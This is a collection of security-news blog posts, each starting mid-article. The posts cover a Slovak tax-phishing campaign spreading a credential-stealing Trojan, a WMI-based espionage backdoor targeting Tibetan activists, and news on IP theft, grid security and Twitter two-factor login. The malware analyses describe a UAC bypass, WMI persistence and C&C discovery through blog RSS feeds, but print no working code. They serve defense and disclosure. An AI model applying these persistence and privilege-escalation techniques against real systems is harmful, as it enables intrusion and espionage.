The Spreading Campaigns

The attack vector in the two campaigns that we discovered were e-mails purporting to be from the Slovak Tax Office (equivalent to the Internal Revenue Service in the US, or the UK’s HM Revenue and Customs). Screenshots of the HTML-formatted e-mails used are shown below.

The translated subject of the emails read: Notification of real estate tax changes and the text, written in proper Slovak, states that payment instructions are to be found in the included attachment. It is interesting to note that this social engineering approach was made more credible by the fact that each taxable entity in the Slovak Republic must use a unique bank account for tax payment. The attacker was not just fluent in Slovak but also well-enough acquainted with local tax legislation to devise such a believable scam.

The attacker modified the delivery method slightly in between the two spam campaigns, but the malware served up in the campaign remained the same.

The first wave of emails offered the “attachments” as download links (on a popular file-sharing service) to one of two files, each in a different format: an RTF file that masqueraded as a Microsoft Word document or an executable file. The RTF file contained an exploitation of CVE-2010-3333 which, if successful, also delivered the malicious executable. The good news was that, according to the file-sharing download statistics, the success rate of the exploit downloading the malware was less than 10%. Unfortunately, many people still opted to download the executable directly from the second (backup) link in the email, perhaps after seeing a garbled-looking document.

The second campaign was more straightforward and, according to download statistics, more successful. The hypertext link in the email pointed to an executable file (with a .SCR extension), without explicitly mentioning the file format.

The Malware

The malware used in these attacks was an ordinary credentials-stealing Trojan, which was already detected prior to these campaigns. ESET’s software detects it as Win32/Sazoora.A.

Win32/Sazoora.A is designed to steal a victim’s logon credentials from web browsers. Specifically, the Trojan contains libraries for injecting into Internet Explorer, Mozilla Firefox or Google Chrome. Win32/Sazoora implements several data-stealing techniques:

• Intercept any information entered into HTML forms in the aforementioned browsers
• Extract stored credentials from the browsers
• Inject fraudulent HTML code into webpages in order to steal credit-card related data

The stolen data is then periodically sent to a remote server (the URLs of which are hard-coded in the binary). The following screenshots show the HTML web-injects used to lure the victim into entering his credit-card credentials.

The last screenshot – of a payment form for Microsoft Windows Updates – is particularly interesting. Note that none of the above mentioned techniques are novel at all, and are commonly used by banking Trojans such as the infamous Zeus and SpyEye families. But unlike those families, Win32/Sazoora.A features configuration options that are less dynamic as regards both the Command & Control server addresses and the web-inject HTML hard-coded in the analyzed binary.

ESET LiveGrid® detection rates for Win32/Sazoora indicate that the Trojan was mostly seen in Slovakia (over 60% of all detections), undoubtedly as a result of these campaigns. The country with the second highest number of detections is Switzerland, but it is important to note that Sazoora is a generic information stealing Trojan, not customized in the Slovak attacks in any way, except for the C&C server address, so the Swiss detections may just indicate that the actual author of the malware has sold it to multiple clients.

The Victims

Our telemetry indicates that many of the targets successfully infected through malware-spreading emails weren’t accidental or purely random. The emails were mass distributed using a generic list of hopefully-Slovak e-mail addresses. And as it turned out, some of the victims identified so far include physicians, accountants and several institutions. These were considerably more likely to click on the links, as the content of the e-mail was relevant to their profession (and also the upcoming tax deadlines made it even more likely for them to check the content).

We have also performed a detailed analysis of one victim’s infected computer at their request after they noticed suspicious activity relating to their bank account. It turned out that they received one of the aforementioned emails, were infected by Win32/Sazoora.A and had their online banking credentials stolen. The most interesting thing about this infection, however, was the fact that the attacker was prevented from stealing any money from the victim’s account by the bank account’s grid-card protection, a kind of multifactor authentication. The attacker then sent the victim a phishing email passed off as some kind of client verification by the bank, in which they asked for a specified code from the grid-card. The victim was not fooled by this attempt.

Other victims may not have been so fortunate. This case again confirms the necessity for employee education with regard to phishing (and information security in general), especially when the employees handle sensitive corporate or customer data.

Kudos to Peter Košinár, David Gabriš and Miro Babiš for their work on the case.

The post Tax Returns: Slovakian spyware campaign appeared first on We Live Security.

The Commission on the Theft of American Intellectual Property includes former government officials such as Dennis Blair, the former U.S. Director of National Intelligence.

“The scale of international theft of American intellectual property (IP) is unprecedented – hundreds of billions of dollars per year, on the order of the size of US exports to Asia,” the report said.  “The Commission judges that the scope of the problem requires stronger action, involving swifter and more stringent penalties for IP theft.”

The report recommended that the U.S. should, “Support American companies and technology that can both identify and recover IP stolen through cyber means. Without damaging the intruder’s own network, companies that experience cyber theft ought to be able to retrieve their electronic files or prevent the exploitation of their stolen information.”

The report described China as “the world’s largest source of IP theft”. “National industrial policy goals in China encourage IP theft, and an extraordinary number of Chinese in business and government entities are engaged in this practice,” the report said.

The post “Stronger action” urged in face of IP theft from American companies appeared first on We Live Security.

Spending on cybersecurity to protect infrastructure will total $2.9 billion by the end of 2013, the analyst claims.

“The restructuring of the power sector and the emergence of the smart grid has largely ignored the issue of cyber security,” ABI Research claims in a report this week, which described electrical firms as “woefully” prepared for attacks. “Industrial control systems have poor methods of authentication, little encryption, and are not often capable of detecting intrusions. By failing to address cyber security, and focusing on the cost-savings and gained efficiencies of a market-oriented model, the susceptibility to cyber attacks has grown.”

This week the Wall Street Journal reported that hackers had penetrated systems belonging to energy companies in the U.S. Quoting unnamed sources, the WSJ claims that Iranian hackers proceeded “far enough to worry people.”

“Cyber-attacks that can cause serious damage to electrical grids are a reality. Operators need to view cyber security as a core, integrated requirement of their offering and not as a secondary add-on,” says Michela Menting, ABI Research’s senior analyst for cyber security.

Menting says that government efforts to tackle vulnerabilities are raising awareness of the issue, and that companies such as Alliander, Enel, and E.On Nordic have already “made significant efforts at implementing a cybersecurity culture”.

A Congressional survey of electrical utilities this week found that companies faced up to 10,000 attacks per month. Out of 53 companies surveyed, more than a dozen described attacks on their systems as “daily” or “constant”. One company complained of being under a “constant state of ‘attack’ from malware and entities seeking to gain access to internal systems.”

This April, a spear-phishing attack which targeted an American electrical company was documented in this month’s Monitor report from the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT).

The post Electrical grids “woefully prepared” for cyber attacks, warns analyst appeared first on We Live Security.

• Our telemetry systems show that the infection scale is extremely small and strictly limited to Nepal and China. Previous versions of this threat were identified dating back to 2010.
• The main payload is a piece of Javascript code registered in the Windows WMI subsystem, an unusual technique.
• The threat uses fake blogs to discover its C&C servers, which are hosted on Tibet-related domains.
• The commands sent to our test machine infected for the purpose of this investigation were sent manually by the attacker and consisted in collecting information from the filesystem and the registry.
• The characteristics of this operation are very similar to previous campaigns of espionage against Tibetan activists such as OS X Lamadai and others.

Read on to learn the details about the installation and persistence mechanisms used by this malware and its native capabilities and communication protocol. We will also present the bot behavior we observed during our analysis and conclude with some background research about the threat and the domains and IP addresses with which it is associated.

Installation & Persistence

Win32/Syndicasec uses an exploit to get access to a target computer in the first instance. Our engine successfully stopped the exploitation attempt but was unable to capture the original exploit itself. Upon successful exploitation, a two-stage installation process begins.

The stage 1 dropper makes a few sanity checks on the system. It will look for the presence of %SYSTEM32%\sysprep.exe: if that is present, a cabinet archive (.cab) will be copied into the %TEMP% folder and its content (a single library) will be installed to %SYSTEM32%\cryptbase.dll using the standard Windows Update Standalone installer (wusa.exe):

The Cabinet file is stored unobfuscated inside the dropper. Only the Cabinet file header is missing: this is dynamically corrected in memory prior to writing the file on disk.

The dropper then attempts to exploit a vulnerability in Microsoft’s User Account Control (UAC) whitelisting process to run arbitrary commands with elevated privileges. This topic is well described by Leo Davidson.

Inspecting the cryptbase.dll file reveals that it is a compiled version of Leo’s proof-of-concept code, right down to the exact return value of DllMain(), which is -69.

This technique is one of the privilege escalation techniques used by Win32/Rootkit.Avatar, an advanced rootkit analyzed recently by our colleagues Anton Cherepanov and Aleksandr Matrosov.

Inside the library, we can see a path related to the compilation project. We were not able to find any meaning to the “psm2” project name.

Once this step has been performed, the second stage dropper is stored on disk as %TEMP%\gupdate.exe. If sysprep.exe is present on the system, the file is launched by a call to sysprep.exe, leveraging the UAC whitelist vulnerability previously explained. Otherwise, gupdate.exe is simply executed by a call to cmd.exe.

Gupdate.exe is in charge of installing the real payload on the system. The technique used is one we rarely see in the wild and is based on the WMI subsystem that was well documented by Julius Dizon, et al of Trend Micro, in their excellent technical whitepaper available here. This same technique was also seen used by Stuxnet.

This technique has the excellent property (from the attacker’s point of view) of not requiring any malicious code to be stored as a regular file on disk. This causes standard dynamic analysis tools such as Process Monitor to fail to clearly highlight the malicious activity.

Here is how the final payload is persistently installed on a victim’s system. First, a piece of JavaScript is decrypted by gupdate.exe using a simple XOR operation:

Then, the proper WMI classes are created.

1. __TimerInstruction

Win32/Syndicasec creates a __TimerInstruction to raise a custom event named “ProbeScriptInit” every 60,000 milliseconds.

2. __EventFilter

The __EventFilter class is responsible for linking the custom timer to the malicious code contained in the __EventConsumer element described below.

3. __EventConsumer

This class contains the malicious code to be executed every time the __TimerInstruction raises an event.

These objects are permanently registered in the root\subscription namespace, thus ensuring stealth and persistence.

Malware capabilities & network communication

Let’s have a look now at the malicious script contained in the __EventConsumer object. The code is straightforward to analyze and almost self-documenting once properly formatted.

First, one of the hardcoded URLs is randomly chosen and contacted via a standard HTTP GET.  We’ll call these the Stage One URLs. All the hardcoded URLs lead to a RSS feed for a fake blog seen here:

The key element in this RSS feed is the <title> tag, which contains an encrypted string inside two ‘@’ delimiters.

The script code shows which decoding routine is used to decrypt this string:

The decrypted string reveals another URL, which we will call a Stage Two URL. These URLs provide the address of the C&C and are used to retrieve commands and post results.

The initial communication sent to a Stage Two URL is an HTTP POST request containing some basic information about the infected machine. The response to this request is an HTML div element that may contain one or more commands.

Static analysis shows that a populated command array consists of obfuscated Javascript that gets directly eval()’ed by the master script. There are no built-in functions in the master script, so at this point we cannot tell what this malware is being used for.

Observed activity

In parallel with analysis of the code, we started to monitor the behavior of a test machine that we infected with Win32/Syndicasec. The first few days of monitoring showed no activity whatsoever. We then started receiving commands from the C&C. The interaction between the C&C and the bot did not look to be automated at all. Every day would bring different commands sent at non-regular time intervals, making it look just as if someone was sitting behind a console and manually controlling infected hosts.

Here is an excerpt from one of the first sessions with the C&C we observed. If you pay attention to the timestamps, the entire list of commands was spread over more than 30 minutes. Note that each command includes all the Javascript needed to execute the entrypoint function. We have included the entire code for only a few interesting calls for the sake of brevity.

Commands that have the same timestamp were received in the same command array.

Basically, the operator was browsing our filesystem and looking at detailed settings and operations on the infected machine, such as network settings, attached drives and running programs.

The day after this visit, the operator sent another set of commands to gather some system information specific to our infected system.

In this session, the commands sent by the operator had roughly the same purpose, but were done differently, strongly suggesting a different operator to the previous day. We also note some sort of typo or bug in this line:

ExecuteCommand(‘dir c:\\dir c:’);

The Stage Two URLs remained unchanged until 2013-04-22. The three blog entries in the hardcoded Stage One URLs were all changed on that same day within a 30-minute window to direct infected systems to a new Stage Two domain: netfortibt.info. Details of this new domain can be found in the next section.

Malware history

Now that we know how the malware gets installed on a target system and what capabilities it offers to the attacker, let’s establish some context around this threat.

First, we were able to find a version of the master script dating from July 2010, uploaded to an online Javascript analyzer. The screenshot below shows some differences in the first few lines of the script. We can clearly see the version number evolution, passing from 0.5.2 to a 1.2.0 release.

When further analyzing the differences between the two versions, we can see that the encryption present in the <title> tag of the Stage One RSS feed did not change. On the other hand, the commands sent from the C&C went from cleartext to being encrypted in version 1.2.0 of the script (see the circleDecode() function):

Finally, we can see that the old version performs the WMI calls needed to register itself in the root\subscription namespace, while version 1.2.0 depends on its dropper to perform this step.

The old script contains only one hardcoded Stage One URL, which is still active at the time of writing.

We can see that only twenty-five (25) users have visited this page since it was posted in September 2010. The decrypted <title> tag reveals an inactive Stage Two URL (http://<redacted>.hostaim.com/summer/ieupdate.php).

Another piece of information was also found using the same Javascript analyzer. We can see a dialogue between an infected host and a C&C dating from 2012. The query string reveals that the infected host is running version 1.01 of the master script.

This clearly shows that this threat has been maintained and used over several years.

Let’s look now at the domains involved in this operation. The Stage One 1 URLs are all pointing to free blog-sites and are rather uninteresting. The Stage Two URLs are more relevant and deserve closer examination.

In the course of our monitoring, we saw two active Stage Two URLs:

Unlike the DoD IP, the other three IPs reveal many hundreds of domain names to which A records are pointing. Most of these domains were registered less than a year ago and point to amateur-looking websites for small businesses, all in Asian languages.

The three domains shown in the previous table also reveal a clear reference to Tibet.  The ‘ned’ in ‘nedfortibt.info’ relates to the National Endowment for Democracy organization, described on their website as: “a private, nonprofit foundation dedicated to the growth and strengthening of democratic institutions around the world. Each year, with funding from the US Congress, NED supports more than 1,000 projects of non-governmental groups abroad who are working for democratic goals in more than 90 countries.”

The NED is openly supportive of Tibetans in their uneasy relations with China.

Conclusion

This analysis showed an implementation of rather unusual techniques to build a stealthy and flexible backdoor. The lack of built-in commands prevents us from discovering the real end-goal of this operation. However, we can affirm that the various characteristics observed around this threat are similar to other espionage campaigns against Tibetan activists that we have observed.

MD5 hashes of the files analyzed:

stage1_dropper.exe      7ee6a8cc75b5e8adf64af899fabd88a4
gupdate.exe             b60ce366e142200e3191a1dffdf7283c
CryptBase.dll           c469b1010f348bd4a5bd5471ff388464

Alexis Dorais-Joncas
Security Intelligence Team Lead

The post Syndicasec in the Sin Bin: targeted espionage malware in action appeared first on We Live Security.

The new, SMS-based system was announced via a post on the official Twitter blog.

“Today we’re introducing a new security feature to better protect your Twitter account: login verification,” said Jim O’Leary of the site’s Product Security Team in his post. “This is a form of two-factor authentication. When you sign in to twitter.com, there’s a second check to make sure it’s really you. You’ll be asked to register a verified phone number and a confirmed email address. ”

“After you enroll in login verification, you’ll be asked to enter a six-digit code that we send to your phone via SMS each time you sign in to twitter.com,” O’Leary writes. The system has to be activated via Twitter’s “Account Settings” page.

ESET Senior Research Fellow David Harley says, “I’m not a fan of static passwording – in fact, I was reminded of something I’ve said before in a paper: ‘The sad fact is, static passwords are a superficially cheap but conceptually unsatisfactory solution to a very difficult problem, especially if they aren’t protected by supplementary techniques.’”

“So the gradual drift towards two factor by social media sites is encouraging, though I doubt that too many people will take advantage of such facilities while they’re just optional. In fact, Twitter did take a more forceful approach a few years ago by preventing people from using any passwords from its own blacklist of the most stereotyped passwords: I referred to it in a paper on PINs and passwords.”

Pressure on Twitter to improve security has grown in recent weeks, after a spate of incidents including an attack on the main Associated Press Twitter account where hackers sent out bogus “news” about an attack on President Obama. The AP Tweet caused panic on stock markets, wiping 143 points off the Dow Jones in minutes. Twitter previously provided media companies with guidelines on how to resist such hacks, including steps such as designating specific PCs to access company Twitter accounts.

“This release is built on top of Twitter via SMS, so we need to be able to send a text to your phone before you can enroll in login verification (which may not work with some cell phone providers). However, much of the server-side engineering work required to ship this feature has cleared the way for us to deliver more account security enhancements in the future. Stay tuned,” said O’Leary.

The post Twitter beefs up security after wave of attacks on media sites appeared first on We Live Security.

A report by the group found that 41 per cent of the FSB’s membership have been a victim of cybercrime in the past year. The most common threat is virus infections, with 20% of small businesses falling victim – while 8% have been victims of hacking and 5% have suffered security breaches.

In total, cybercrime costs small business £785 million ($1.1 billion) a year. But the Federation of Small Businesses says the cost to the wider economy could be even greater, as small businesses avoid using the internet for fear of cyber attacks. Previous FSB research shows that only a third of businesses with their own website use it for sales.

Small businesses are responding to the threat – 36% of respondents regularly install security patches, and six out of ten claim to regularly update antivirus software. Only 20% say they have taken no steps to protect themselves against cybercrime.

Mike Cherry, the National Policy Chairman, Federation of Small Businesses, said: “Small business cybercrime poses a real and growing threat and it isn’t something that should be ignored. Many businesses will be taking steps to protect themselves but the cost of crime can act as a barrier to growth.

“For example, many businesses will not embrace new technology as they fear the repercussions and do not believe they will get adequate protection from crime.”

The post Small business cybercrime costs $6,000 a year, says British group appeared first on We Live Security.

Technology site The Verge likened the new console to the Telescreen from 1984, saying that the Xbox One Kinect microphone function raised concerns about the information available if the machine were to be compromised by a malicious actor.

The function is part of the console’s Kinect controller, which is now part of the Xbox One package. The new Xbox One has voice and gesture control built into its operating system.

Saying, “Xbox on” to the Kinect will switch on the console – which means that the console must “listen” constantly for commands, even when supposedly switched off. At Microsoft’s launch event in Seattle, demonstrators described the peripheral as the “eyes and ears of the living room”.

The sensor offers a Full HD infrared view, and is so sensitive it can read users’ heartbeats via tremors and colour changes invisible to the naked eye.
The news raised concerns among fans. “I think it’s creepy that you can say “Xbox on” and it will turn on. It means it’s always listening to you,” said one Twitter user.

The Verge suggested that the “always on” microphone could have serious implications for privacy – possibly more so even than Google Glass. “The new Xbox could pose greater privacy implications – especially if the system, which many users will connect to the internet, is compromised remotely by a malicious actor,” said the site.

The post Xbox One Kinect microphone “always on” security fears appeared first on We Live Security.

“Disruptive and destructive attacks on our country will get worse,” said Alexander, the leading U.S. general in charge of the nation’s cybersecurity.  “Mark my words, it will get worse.”

Speaking at the Reuters Cybersecurity Summit in Washington last week, Alexander described cyber espionage as “the greatest transfer of wealth in history.”

U.S. Secretary of Homeland Security Janet Napolitano said at the same summit that her main concern was with “the known unknown”.

Napolitano said that the recent heist which used ATM machines around the world to withdraw $45 million via prepaid debit cards offered an illustration of the scope of cybercrime.The attack targeted prepaid credit cards. By raising the limit on cloned cards the hackers were able to withdraw “unlimited” funds for short periods. In New York, the hackers withdrew $2.8 million in hours.

“We don’t have the identity of all the adversaries who are trying to either commit crimes or acts over the cyber networks,” said Napolitano. “The things we know about, we can deal with. It’s the known unknown.”

The post Cyber attacks on America “will get worse”, warns NSA director appeared first on We Live Security.

Tim Rains says that for several years, computer viruses have been “out of favour with attackers”, but points to statistics showing that they have made a comeback in 2012, at least in certain territories.

Writing on the Microsoft Security Blog, Rains says, “I have rarely seen the virus threat category found on more than 5 percent of systems with detections globally. But more recently I have noticed that viruses seem to be making a comeback.  The relative prevalence of viruses has been trending up.  The prevalence worldwide for the virus threat category was 7.8 percent in the fourth quarter of 2012.”

Rains says that for the past few years, “Viruses simply didn’t support the profit motive many attackers had in the same way that Trojan downloaders and droppers, miscellaneous Trojans, and password stealers and monitoring tools all did.” But new threats designed to steal information are sparking a comeback.

Rains says that computer viruses proliferate in countries with low levels of broadband penetration, such as Egypt, Indonesia and Ethiopia, where software is updated rarely, and infection rates can be as high as 40%.

Pointing to the success of Win32/Sality, a family of polymorphic file injectors found on 8,204,434 computers worldwide, Rains says, “Sality is one of the top five detections on Windows XP.  Sality hasn’t been as successful on newer versions of Windows. Sality’s success proves that file infectors can be still be successful.  Unlike computer viruses from yesteryear, attackers today are trying to steal information, sometimes by turning on computers’ microphones and cameras.”

Rains says that defending against such threats is “relatively easy” – suggesting users update their system software frequently, and also run real-time antivirus, as well as using caution with removable media such as USB sticks and external hard drives.

The post Computer viruses “are making a comeback”, says Microsoft appeared first on We Live Security.

Bank security officers were invited to a classified video conference held at 40 FBI field offices around the country, according to FBI Executive Assistant Director Richard McFeely.

The video conference offered insight into “who was behind the keyboards,” according to McFeely, speaking to at the Reuters Cybersecurity Summit.

Customer accounts have not been put at risk by the attacks – although the sustained DDoS attacks have meant it has been impossible to access bank websites. One NBC report claimed that the websites of 15 major banks were offline for a total of 249 hours in six weeks earlier this year.

Earlier this year President Barack Obama signed an executive order to improve information-sharing between companies and branches of government, saying, “”We cannot look back years from now and wonder why we did nothing in the face of real threats to our security and our economy.”

Banks such as Wells Fargo and Bank of America were first attacked in September 2012, by a group calling itself Izz ad-Din al-Qassam Cyber Fighters. The attacks have continued since then. McFeely declined to discuss who was behind the attacks, or other details of the continuing investigation.

McFeely said that the one-day security clearances are part of an effort to communicate more effectively with victims of cybercrime, admitting that the agency had been “terrible” in the past. “That’s 180 degrees from where we are now,” McFeely said.

McFeely said, “”The first time we bring someone in from out of the country in handcuffs, that’s going to be a big deal.”

The post FBI shares information on cyber attacks with US banks appeared first on We Live Security.